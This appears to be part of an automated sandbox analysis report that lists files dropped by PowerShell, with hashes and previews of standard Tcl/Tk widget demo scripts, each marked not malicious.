                                                                                                                                                                                                                      Preview:#!/bin/sh..# the next line restarts using wish \..exec wish "$0" ${1+"$@"}....# rolodex --..# This script was written as an entry in Tom LaStrange's rolodex..# benchmark. It creates something that has some of the look and..# feel of a rolodex program, although it's lifeless and doesn't..# actually do the rolodex application.....package require Tk....foreach i [winfo child .] {.. catch {destroy $i}..}....set version 1.2....#------------------------------------------..# Phase 0: create the front end...#------------------------------------------....frame .frame -relief flat..pack .frame -side top -fill y -anchor center....set names {{} Name: Address: {} {} {Home Phone:} {Work Phone:} Fax:}..foreach i {1 2 3 4 5 6 7} {.. label .frame.label$i -text [lindex $names $i] -anchor e.. entry .frame.entry$i -width 35.. grid .frame.label$i .frame.entry$i -sticky ew -pady 2 -padx 1..}....frame .buttons..pack .buttons -side bottom -pady 2 -anchor center..button .buttons.clear -text Clear.
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with very long lines (355), with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):5508
                                                                                                                                                                                                                      Entropy (8bit):4.957302043207915
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:0xOfgdGS4JJNX+vnvFfvy2vpfvXSvJwevvTvffdvjvnfT7w05aWfpixynM2iN6iK:0xOodGS4JJ8CWHw/fdfT7w053hi0Ovu7
                                                                                                                                                                                                                      MD5:F55260934E235BFA812AB433B2483AF7
                                                                                                                                                                                                                      SHA1:3FF23F6FFE38CC2DCDF230376E2DEA749D9F18A8
                                                                                                                                                                                                                      SHA-256:FD94B05BC5E28E8E7A932AF964E9544389B5CCD76498916762240E48D382D121
                                                                                                                                                                                                                      SHA-512:F19A4EE5548193BDD4D97CCADA5FD84BCD2054B3BAF54AD8251AA0EC358858F709CEBF993E7B4059FBFAFCC080BC8BBC29505569DCB7CFFFCF957925A45220A0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# ruler.tcl --..#..# This demonstration script creates a canvas widget that displays a ruler..# with tab stops that can be set, moved, and deleted.....if {![info exists widgetDemo]} {.. error "This script should be run from the \"widget\" demo."..}....package require Tk....# rulerMkTab --..# This procedure creates a new triangular polygon in a canvas to..# represent a tab stop...#..# Arguments:..# c -..The canvas window...# x, y -.Coordinates at which to create the tab stop.....proc rulerMkTab {c x y} {.. upvar #0 demo_rulerInfo v.. set newTab [$c create polygon $x $y \... [expr {$x+$v(size)}] [expr {$y+$v(size)}] \... [expr {$x-$v(size)}] [expr {$y+$v(size)}]].. set fill [$c itemcget $newTab -outline].. $c itemconfigure $newTab -fill $fill -outline {}.. set v(normalStyle) "-fill $fill".. return $newTab..}....set w .ruler..catch {destroy $w}..toplevel $w..wm title $w "Ruler Demonstration"..wm iconname $w "ruler"..positionWindow $w..set c $w.c....label $w.msg
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with very long lines (772), with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2317
                                                                                                                                                                                                                      Entropy (8bit):4.787706066762009
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:dLIsXeuM3+qwpoLpRsD+R8/MPI1CV5vDm64pGR+el5SSq:FO0HGLp8i+elQf
                                                                                                                                                                                                                      MD5:D52ACE55ACFF29FCAFDF985215561DA0
                                                                                                                                                                                                                      SHA1:F0C32E461758DA9D41CA2FB47EA97D2F42B3F9F7
                                                                                                                                                                                                                      SHA-256:CDD24DB3C873D29539AB345A2D4035E22BE2360BB61B4D1BE8313FC129C57F6D
                                                                                                                                                                                                                      SHA-512:E618D0D4C1725DB45F307F02ED9766566205DAFA2FAF6E7CD83A55E1E85207B01F1A390290EAF658689531510232DEEEADEC8D72639965A42ED2FA83444E574A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# sayings.tcl --..#..# This demonstration script creates a listbox that can be scrolled..# both horizontally and vertically. It displays a collection of..# well-known sayings.....if {![info exists widgetDemo]} {.. error "This script should be run from the \"widget\" demo."..}....package require Tk....set w .sayings..catch {destroy $w}..toplevel $w..wm title $w "Listbox Demonstration (well-known sayings)"..wm iconname $w "sayings"..positionWindow $w....label $w.msg -font $font -wraplength 4i -justify left -text "The listbox below contains a collection of well-known sayings. You can scan the list using either of the scrollbars or by dragging in the listbox window with button 2 pressed."..pack $w.msg -side top....## See Code / Dismiss buttons..set btns [addSeeDismiss $w.buttons $w]..pack $btns -side bottom -fill x....frame $w.frame -borderwidth 10..pack $w.frame -side top -expand yes -fill both -padx 1c......ttk::scrollbar $w.frame.yscroll -command "$w.frame.list yview"..ttk::scrollb
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4542
                                                                                                                                                                                                                      Entropy (8bit):4.838241879150059
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:JlOkLvHqMWBC5ad+r6f6J3FqYCqOV/3Ql+H2hiGsYvNFdW0208WxlYB:rO2qBXCMiEY3g/Wg
                                                                                                                                                                                                                      MD5:4095A88653DB88E386B3B19F2030294C
                                                                                                                                                                                                                      SHA1:00A1E209DE5B155ADD67E8DE16C690C97353B9B4
                                                                                                                                                                                                                      SHA-256:BEA80B1B64879F571576E21DEB3D909B95418EAC230376F3DF68F757A7EDDF02
                                                                                                                                                                                                                      SHA-512:25FEB3D6FFDAE12261F21FADBBEE8ADDCD10849B8E403C62A00DDC94F7C978E24493C587550A3BA1EAE3866B959E7480A4C7AED085AFE10D850237FA32A10621
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# search.tcl --..#..# This demonstration script creates a collection of widgets that..# allow you to load a file into a text widget, then perform searches..# on that file.....if {![info exists widgetDemo]} {.. error "This script should be run from the \"widget\" demo."..}....package require Tk....# textLoadFile --..# This procedure below loads a file into a text widget, discarding..# the previous contents of the widget. Tags for the old widget are..# not affected, however...#..# Arguments:..# w -..The window into which to load the file. Must be a..#..text widget...# file -.The name of the file to load. Must be readable.....proc textLoadFile {w file} {.. set f [open $file].. $w delete 1.0 end.. while {![eof $f]} {...$w insert end [read $f 10000].. }.. close $f..}....# textSearch --..# Search for all instances of a given string in a text widget and..# apply a given tag to each instance found...#..# Arguments:..# w -..The window in which to search. Must be a text widg
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1873
                                                                                                                                                                                                                      Entropy (8bit):4.83874261755897
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:0IXBXeVA44dW6NIT5mcHyRAh+fhocxOmY/li:0aOFqW6NIccHynfh/Y/li
                                                                                                                                                                                                                      MD5:2E18CB6011F23F9A19757EE259765BC4
                                                                                                                                                                                                                      SHA1:44F4E249EE2FD2D2C75969BE0B8973DDA05C3FCC
                                                                                                                                                                                                                      SHA-256:77C7708062E226C7B55D81B89481EA088935759449DC4AF754399BF609F5BEBD
                                                                                                                                                                                                                      SHA-512:582050F114DB8F481D770D73E0928165E4B6266CEDCDD6F9EFB4329F85A95FCB275516D5231A5789B7F07378D8A9B5545CDC74AA2B6F29EF7AB19327AC59889F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# spin.tcl --..#..# This demonstration script creates several spinbox widgets.....if {![info exists widgetDemo]} {.. error "This script should be run from the \"widget\" demo."..}....package require Tk....set w .spin..catch {destroy $w}..toplevel $w..wm title $w "Spinbox Demonstration"..wm iconname $w "spin"..positionWindow $w....label $w.msg -font $font -wraplength 5i -justify left -text "Three different\...spin-boxes are displayed below. You can add characters by pointing,\...clicking and typing. The normal Motif editing characters are\...supported, along with many Emacs bindings. For example, Backspace\...and Control-h delete the character to the left of the insertion\...cursor and Delete and Control-d delete the chararacter to the right\...of the insertion cursor. For values that are too large to fit in the\...window all at once, you can scan through the value by dragging with\...mouse button2 pressed. Note that the first spin-box will only permit\...you to type in integers
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:POSIX shell script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1385
                                                                                                                                                                                                                      Entropy (8bit):4.8833204592138095
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:dFIM4Ogm3CuzGSJkw6EotZOXDNrxd8J3FPdyZnO8CDX1Sec9Zfgs2TliD+kMYYg:dp3rs1pt8DxHqUnT4SeCZfgxiDeYF
                                                                                                                                                                                                                      MD5:9DA95778F94F274B3BAADF67CC3614EC
                                                                                                                                                                                                                      SHA1:4F82D25F79907379EEBDA588E83E6E938FCA1A21
                                                                                                                                                                                                                      SHA-256:5FB92B6033F2D05915B984076971DB0EF87BAD1E463591F5BA9507BDAEB95966
                                                                                                                                                                                                                      SHA-512:A59CEE718828418E1FE01E30B905C1673B2BCDC4019DF982779FD60B126C57C385D3AF8C3A7C5C7DCC1F830C8153DF6597C2D5F024F5079D1259DA98472C7DF6
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#!/bin/sh..# the next line restarts using wish \..exec wish "$0" ${1+"$@"}....# square --..# This script generates a demo application containing only a "square"..# widget. It's only usable in the "tktest" application or if Tk has..# been compiled with tkSquare.c. This demo arranges the following..# bindings for the widget:..#..# Button-1 press/drag:..moves square to mouse..# "a":....toggle size animation on/off....package require Tk..;# We use Tk generally, and.....package require Tktest..;# ... we use the square widget too.....square .s..pack .s -expand yes -fill both..wm minsize . 1 1....bind .s <Button-1> {center %x %y}..bind .s <B1-Motion> {center %x %y}..bind .s a animate..focus .s....# The procedure below centers the square on a given position.....proc center {x y} {.. set a [.s size].. .s position [expr {$x-($a/2)}] [expr {$y-($a/2)}]..}....# The procedures below provide a simple form of animation where..# the box changes size in a pulsing pattern: larger, smaller, larger
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2102
                                                                                                                                                                                                                      Entropy (8bit):4.847920784236436
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:xL+dhCXerwyqxt2nXixhb1FBYLpRHDNpCxpPHFjW9xTd7:DOlwt2nXixHFa3NpuPATd7
                                                                                                                                                                                                                      MD5:61C0968DDC3A2B1692B14DDEEEB3DA3D
                                                                                                                                                                                                                      SHA1:EBCE3FC1F4C40273AE4307B1782D46382632EDD5
                                                                                                                                                                                                                      SHA-256:12EFE21106986B06D1F65BD2734514707FA70A7A8282BBD59C681BA02B0C9361
                                                                                                                                                                                                                      SHA-512:45A9946E7E879C8865BDBD14E1E71C541BFAFE2B1E502ED4514EEC49DD261D0A3078263973B80C4DA8F86DB22AFDBCE901F5A67B26E31EABCB9385D017E81118
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# states.tcl --..#..# This demonstration script creates a listbox widget that displays..# the names of the 50 states in the United States of America.....if {![info exists widgetDemo]} {.. error "This script should be run from the \"widget\" demo."..}....package require Tk....set w .states..catch {destroy $w}..toplevel $w..wm title $w "Listbox Demonstration (50 states)"..wm iconname $w "states"..positionWindow $w....label $w.msg -font $font -wraplength 4i -justify left -text "A listbox containing the 50 states is displayed below, along with a scrollbar. You can scan the list either using the scrollbar or by scanning. To scan, press button 2 in the widget and drag up or down."..pack $w.msg -side top....labelframe $w.justif -text Justification..foreach c {Left Center Right} {.. set lower [string tolower $c].. radiobutton $w.justif.$lower -text $c -variable just \.. -relief flat -value $lower -anchor w \.. -command "$w.frame.list configure -justify \$just" \..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):7098
                                                                                                                                                                                                                      Entropy (8bit):4.650931236611391
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:qOhEOPQYm0QhAwLsEmrK3TjPBmT8wC4fsQTL7hXsS4XkSgPMTuF4ruV3vqF6gXZB:qZjq5k
                                                                                                                                                                                                                      MD5:63D063BC7DE08A34DD0F3A84CADF7E0E
                                                                                                                                                                                                                      SHA1:BE8A1EFBB8141209B61EAC215601A691433A21F6
                                                                                                                                                                                                                      SHA-256:798F10AF8F6DFDCB4F95D075224E6DE051565D401AA28604A45005A592EFB263
                                                                                                                                                                                                                      SHA-512:61BC87B09289D9D89709DBC1866B839D9055563EA97D698C456DDFBA5BB0B1E6B005C262D066875248CEB9D2A3B4D115E212B0084B97945F839E60C02329C472
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# style.tcl --..#..# This demonstration script creates a text widget that illustrates the..# various display styles that may be set for tags.....if {![info exists widgetDemo]} {.. error "This script should be run from the \"widget\" demo."..}....package require Tk....set w .style..catch {destroy $w}..toplevel $w..wm title $w "Text Demonstration - Display Styles"..wm iconname $w "style"..positionWindow $w....## See Code / Dismiss buttons..set btns [addSeeDismiss $w.buttons $w]..pack $btns -side bottom -fill x....# Only set the font family in one place for simplicity and consistency....set family Courier....text $w.text -yscrollcommand "$w.scroll set" -setgrid true \...-width 70 -height 32 -wrap word -font "$family 12"..ttk::scrollbar $w.scroll -command "$w.text yview"..pack $w.scroll -side right -fill y..pack $w.text -expand yes -fill both....# Set up display styles....$w.text tag configure bold -font "$family 12 bold italic"..$w.text tag configure big -font "$family 14 bold"..$w.tex
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):5365
                                                                                                                                                                                                                      Entropy (8bit):4.703490761141157
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:eLaVh2qnEO1NRRUU19ZHI5C6J7H7d7K76bvGGh7k8REejWS2/qms4tdVi/8GDAoR:eeVcqnEQNRRUU19ZHI5CiLhO2bvGGh7D
                                                                                                                                                                                                                      MD5:443695502A48376FFCFA817D97C52638
                                                                                                                                                                                                                      SHA1:04F4419DF12B00FF7F96348B23BC020B5E864607
                                                                                                                                                                                                                      SHA-256:EB7A61EBDCF654C2AB1AD5B9444A115E40C90E8C88A8DC5B7B4870286DDB9241
                                                                                                                                                                                                                      SHA-512:7C3B333DB9B602B493E763579265F2DFD2810057EF2D02D7839AB8CD174A3E234A381DCEBDB3180BCAC3437545041454E0F6A49098C085FBE2716CD21193C89F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Tcl autoload index file, version 2.0..# This file is generated by the "auto_mkindex" command..# and sourced to set up indexing information for one or..# more commands. Typically each line is a command that..# sets an element in the auto_index array, where the..# element name is the name of a command and the value is..# a script that loads the command.....set auto_index(arrowSetup) [list source -encoding utf-8 [file join $dir arrow.tcl]]..set auto_index(arrowMove1) [list source -encoding utf-8 [file join $dir arrow.tcl]]..set auto_index(arrowMove2) [list source -encoding utf-8 [file join $dir arrow.tcl]]..set auto_index(arrowMove3) [list source -encoding utf-8 [file join $dir arrow.tcl]]..set auto_index(textLoadFile) [list source -encoding utf-8 [file join $dir search.tcl]]..set auto_index(textSearch) [list source -encoding utf-8 [file join $dir search.tcl]]..set auto_index(textToggle) [list source -encoding utf-8 [file join $dir search.tcl]]..set auto_index(itemEnter) [list source -
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:POSIX shell script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):11608
                                                                                                                                                                                                                      Entropy (8bit):5.0273068070293965
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:8cr4xehtvoi4sKDtWVCnMNBW1oLmu+1MF0ifIJVdNY3yfns26KowBHlq:8c8xehtvb4sKhWVCMNBWGLmugMF0pJVq
                                                                                                                                                                                                                      MD5:3EA64DF9D86EF1FAEF5A22548D3CDD82
                                                                                                                                                                                                                      SHA1:D49EDF8D3BA2D18E41C3B37346F2B1622B291833
                                                                                                                                                                                                                      SHA-256:CF3F2CF7A612675F640CA71744A5CB5437E94A70BCBFDB899FF3C257D3868EB1
                                                                                                                                                                                                                      SHA-512:3825395F05CBF1A93C61225ECBAC7A390241E3A93D22D1B215B0D8E3CBE7DF2FE6CE505B0F124B2C0BEA708FAFF36D5052E2273A0468809672773A7FABCD8682
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#!/bin/sh..# the next line restarts using wish \..exec wish "$0" ${1+"$@"}....# tcolor --..# This script implements a simple color editor, where you can..# create colors using either the RGB, HSB, or CYM color spaces..# and apply the color to existing applications.....package require Tk..wm title . "Color Editor"....# Global variables that control the program:..#..# colorSpace -...Color space currently being used for..#....editing. Must be "rgb", "cmy", or "hsb"...# label1, label2, label3 -.Labels for the scales...# red, green, blue -..Current color intensities in decimal..#....on a scale of 0-65535...# color -...A string giving the current color value..#....in the proper form for x:..#....#RRRRGGGGBBBB..# updating -...Non-zero means that we're in the middle of..#....updating the scales to load a new color,so..#....information shouldn't be propagating back..#....from the scales to other elements of the..#....program: this would make an infinite loop...# command -...Holds the command
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4404
                                                                                                                                                                                                                      Entropy (8bit):4.676281536003776
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:hKgOXx93pwC3VeAoF4CSUrsCuTvcpZOjzbOcIH3:hKgOXVyxF4CgbcpZO/VM
                                                                                                                                                                                                                      MD5:21D8294852B186122769E201C6A8BD46
                                                                                                                                                                                                                      SHA1:68F5704023B588C0FC8A3CF324BB883882B91D84
                                                                                                                                                                                                                      SHA-256:BFBED67317A86FBCE94321754ECAD255B2DE3FF5B7C735682DAEABAAA9F0086A
                                                                                                                                                                                                                      SHA-512:89F58E042DF8B21CED08E1F578790C88DD20461B8F0FB4A60286A103B21365D82AC9ED5D55C76FD011D3843705D5B21517D3AC6772AC91C0C1B545CDF2445728
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# text.tcl --..#..# This demonstration script creates a text widget that describes..# the basic editing functions.....if {![info exists widgetDemo]} {.. error "This script should be run from the \"widget\" demo."..}....package require Tk....set w .text..catch {destroy $w}..toplevel $w..wm title $w "Text Demonstration - Basic Facilities"..wm iconname $w "text"..positionWindow $w....## See Code / Dismiss buttons..set btns [addSeeDismiss $w.buttons $w {} \...{ttk::button $w.buttons.fontchooser -command fontchooserToggle}]..pack $btns -side bottom -fill x....text $w.text -yscrollcommand [list $w.scroll set] -setgrid 1 \...-height 30 -undo 1 -autosep 1..ttk::scrollbar $w.scroll -command [list $w.text yview]..pack $w.scroll -side right -fill y..pack $w.text -expand yes -fill both....# TIP 324 Demo: [tk fontchooser]..proc fontchooserToggle {} {.. tk fontchooser [expr {[tk fontchooser configure -visible] ?.. "hide" : "show"}]..}..proc fontchooserVisibility {w} {.. $w config
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2250
                                                                                                                                                                                                                      Entropy (8bit):4.722683758930333
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:h6MXegHMlSgCmw+//KM7iy4ftaEJm/CZaIoRVT+K9LGsCfCq:hpObCG7iyLn0oLZCsy
                                                                                                                                                                                                                      MD5:DB84AC00B54E9685430D91087DC43BF8
                                                                                                                                                                                                                      SHA1:B0DD9E005FB0B8C18E110132744E9C8513CA83A1
                                                                                                                                                                                                                      SHA-256:440F52DBEDF0C2E4754C93971D478425C9E78F71DB19DF3274720903647C9E15
                                                                                                                                                                                                                      SHA-512:898D8E30AD084BA977DA714BAFDD0326B20377D3AE54074B307B10777CEAE9F83ACFD621DB8DD9168309283B3C41A9B58C2BAE714EC7E3EC685AEC7A668E703D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# textpeer.tcl --..#..# This demonstration script creates a pair of text widgets that can edit a..# single logical buffer. This is particularly useful when editing related text..# in two (or more) parts of the same file.....if {![info exists widgetDemo]} {.. error "This script should be run from the \"widget\" demo."..}....package require Tk....set w .textpeer..catch {destroy $w}..toplevel $w..wm title $w "Text Widget Peering Demonstration"..wm iconname $w "textpeer"..positionWindow $w....set count 0....## Define a widget that we peer from; it won't ever actually be shown though..set first [text $w.text[incr count]]..$first insert end "This is a coupled pair of text widgets; they are peers to "..$first insert end "each other. They have the same underlying data model, but "..$first insert end "can show different locations, have different current edit "..$first insert end "locations, and have different selections. You can also "..$first insert end "create additional peers of any of th
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:POSIX shell script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1139
                                                                                                                                                                                                                      Entropy (8bit):4.7982906199813025
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:dFIkpQWDq6GQ7a40CmxdpJFNbvsNzTfeXJkg39aBeYg:dzmWD9GXCsbNs1zI39eeF
                                                                                                                                                                                                                      MD5:A26AF3AB4C3BA227938322246DF69FF7
                                                                                                                                                                                                                      SHA1:155D209BEAB0C26ED0DC77D44B6CA8DFD51F9133
                                                                                                                                                                                                                      SHA-256:4A0410F3C13A47EB52D55E781FB54B13D5A0DBEB88BA88EA6E9E74019AE21DDC
                                                                                                                                                                                                                      SHA-512:A8F65B0C04A9B173D6E823FFA707912F3398EF68FA01A52F95FF8E943DA43D3EDBECCBDE7BD9591D0D012B04A62E111B45F50E9B8D4FCAE1CCF93B3319C0E262
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#!/bin/sh..# the next line restarts using wish \..exec wish "$0" ${1+"$@"}....# timer --..# This script generates a counter with start and stop buttons.....package require Tk....label .counter -text 0.00 -relief raised -width 10 -padx 2m -pady 1m..button .start -text Start -command {.. if {$stopped} {...set stopped 0...set startMoment [clock clicks -milliseconds]...tick....stop configure -state normal....start configure -state disabled.. }..}..button .stop -text Stop -state disabled -command {.. set stopped 1.. .stop configure -state disabled.. .start configure -state normal..}..pack .counter -side bottom -fill both..pack .start -side left -fill both -expand yes..pack .stop -side right -fill both -expand yes....set startMoment {}....set stopped 1....proc tick {} {.. global startMoment stopped.. if {$stopped} {return}.. after 50 tick.. set elapsedMS [expr {[clock clicks -milliseconds] - $startMoment}].. .counter config -text [format "%.2f" [expr {double($el
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3364
                                                                                                                                                                                                                      Entropy (8bit):4.882113007655229
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:UOV3jaYOD2fvm8lzCK2taVBWlNFWTjJFe:UOtjaYE5KQsslN+Fe
                                                                                                                                                                                                                      MD5:5A41E1173D53E29277D7C191FC0FCD97
                                                                                                                                                                                                                      SHA1:257BF706488217547D93453F4682BB8B7422AF9B
                                                                                                                                                                                                                      SHA-256:9C2D3B5FA57A402508FC9A4D9464CDACA10504CF85DA8A2742693C42998CBA64
                                                                                                                                                                                                                      SHA-512:36284B7D779E2BA08F91C3A63654762E24ABF8BAEDBC388B8A78963051588EDA1BEEDCD5C4B7EA851CC85BCB26995CE39F66B20333EF2A158B419E5F22E7BDFB
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# toolbar.tcl --..#..# This demonstration script creates a toolbar that can be torn off.....if {![info exists widgetDemo]} {.. error "This script should be run from the \"widget\" demo."..}....package require Tk....set w .toolbar..destroy $w..toplevel $w..wm title $w "Toolbar Demonstration"..wm iconname $w "toolbar"..positionWindow $w....ttk::label $w.msg -wraplength 4i -text "This is a demonstration of how to do\...a toolbar that is styled correctly and which can be torn off. The\...buttons are configured to be \u201Ctoolbar style\u201D buttons by\...telling them that they are to use the Toolbutton style. At the left\...end of the toolbar is a simple marker that the cursor changes to a\...movement icon over; drag that away from the toolbar to tear off the\...whole toolbar into a separate toplevel widget. When the dragged-off\...toolbar is no longer needed, just close it like any normal toplevel\...and it will reattach to the window it was torn off from."....## Set up the toolbar hu
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with very long lines (561), with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3267
                                                                                                                                                                                                                      Entropy (8bit):4.896992528706985
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:lOhyjW6MGuwQvP06Hoc5dAOgv3z834r+cq+K3CSK:lOQjF40cPAOgv3zt+cq5SP
                                                                                                                                                                                                                      MD5:471C92A69DEA89C924A2151B7F5C4A9B
                                                                                                                                                                                                                      SHA1:EF8E682776E06B85C6CEAF9D93860E18D42091F1
                                                                                                                                                                                                                      SHA-256:62052568D2CCA5ED1D9FF6CCAF3821601F8201106FAB9095C20BC19585215535
                                                                                                                                                                                                                      SHA-512:3703F8E5A34976BF0A3A3231CA4543E1474D199313EF869A7949DAA8F2F02E3771B168C12A48E5AFDE1AF65B122901B21AD0678E181FE787A381A8392748D5EE
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# tree.tcl --..#..# This demonstration script creates a toplevel window containing a Ttk..# tree widget.....if {![info exists widgetDemo]} {.. error "This script should be run from the \"widget\" demo."..}....package require Tk....set w .tree..catch {destroy $w}..toplevel $w..wm title $w "Directory Browser"..wm iconname $w "tree"..positionWindow $w....## Explanatory text..ttk::label $w.msg -font $font -wraplength 4i -justify left -anchor n -padding {10 2 10 6} -text "Ttk is the new Tk themed widget set. One of the widgets it includes is a tree widget, which allows the user to browse a hierarchical data-set such as a filesystem. The tree widget not only allows for the tree part itself, but it also supports an arbitrary number of additional columns which can show additional data (in this case, the size of the files found in your filesystem). You can also change the width of the columns by dragging the boundary between them."..pack $w.msg -fill x....## See Code / Dismiss..pack [addSeeD
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with very long lines (562), with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3489
                                                                                                                                                                                                                      Entropy (8bit):4.865121453574143
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:3ZUnm4jXeF2S1jSFCEOQfIk/zVy75pB/J2sb9LnfFj29Dsi61DB9+ZIwr:om4jOzazxVy7HB/Zb9TfFjwIi61DBILr
                                                                                                                                                                                                                      MD5:916F3F8E35AB802C643D82DF4CDC1EC1
                                                                                                                                                                                                                      SHA1:5BD51DD5F7C76124F7EA1D3563DA2862AE3314A3
                                                                                                                                                                                                                      SHA-256:E1E26AA0622D79B6532B54E4ECE6D9136D36C96DD6DACEA1EDDEBF2BB07CB9CC
                                                                                                                                                                                                                      SHA-512:940D68D71D5E196D67D515FBF0B5E2230DAEF50355CFFD3EEE695293900FDEB3898BCBA63A83628A7BB88E96A921E4158AE8B661205E15377880D07CF1552F04
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# ttkbut.tcl --..#..# This demonstration script creates a toplevel window containing several..# simple Ttk widgets, such as labels, labelframes, buttons, checkbuttons and..# radiobuttons.....if {![info exists widgetDemo]} {.. error "This script should be run from the \"widget\" demo."..}....package require Tk....set w .ttkbut..catch {destroy $w}..toplevel $w..wm title $w "Simple Ttk Widgets"..wm iconname $w "ttkbut"..positionWindow $w....ttk::label $w.msg -font $font -wraplength 4i -justify left -text "Ttk is the new Tk themed widget set. This is a Ttk themed label, and below are three groups of Ttk widgets in Ttk labelframes. The first group are all buttons that set the current application theme when pressed. The second group contains three sets of checkbuttons, with a separator widget between the sets. Note that the \u201cEnabled\u201d button controls whether all the other themed widgets in this toplevel are in the disabled state. The third group has a collection of linked radiobu
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with very long lines (642), with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
